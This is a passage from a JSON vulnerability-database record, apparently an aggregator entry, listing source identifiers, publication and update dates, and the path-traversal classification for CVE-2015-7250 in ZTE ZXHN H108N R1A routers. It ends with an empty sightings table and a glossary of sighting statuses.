"date": "2015-11-03T00:00:00",
"db": "CERT/CC",
"id": "VU#391604"
},
{
"date": "2015-11-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-07625"
},
{
"date": "2015-12-30T00:00:00",
"db": "VULHUB",
"id": "VHN-85211"
},
{
"date": "2015-12-30T00:00:00",
"db": "VULMON",
"id": "CVE-2015-7250"
},
{
"date": "2015-11-04T00:00:00",
"db": "BID",
"id": "77421"
},
{
"date": "2016-01-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-006589"
},
{
"date": "2015-11-20T22:24:32",
"db": "PACKETSTORM",
"id": "134492"
},
{
"date": "2015-12-30T05:59:03.253000",
"db": "NVD",
"id": "CVE-2015-7250"
},
{
"date": "2015-11-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201511-238"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-11-04T00:00:00",
"db": "CERT/CC",
"id": "VU#391604"
},
{
"date": "2015-11-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-07625"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-85211"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULMON",
"id": "CVE-2015-7250"
},
{
"date": "2016-02-02T20:05:00",
"db": "BID",
"id": "77421"
},
{
"date": "2016-01-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-006589"
},
{
"date": "2017-09-13T01:29:07.550000",
"db": "NVD",
"id": "CVE-2015-7250"
},
{
"date": "2015-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201511-238"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201511-238"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZTE ZXHN H108N R1A routers contain multiple vulnerabilities",
"sources": [
{
"db": "CERT/CC",
"id": "VU#391604"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201511-238"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…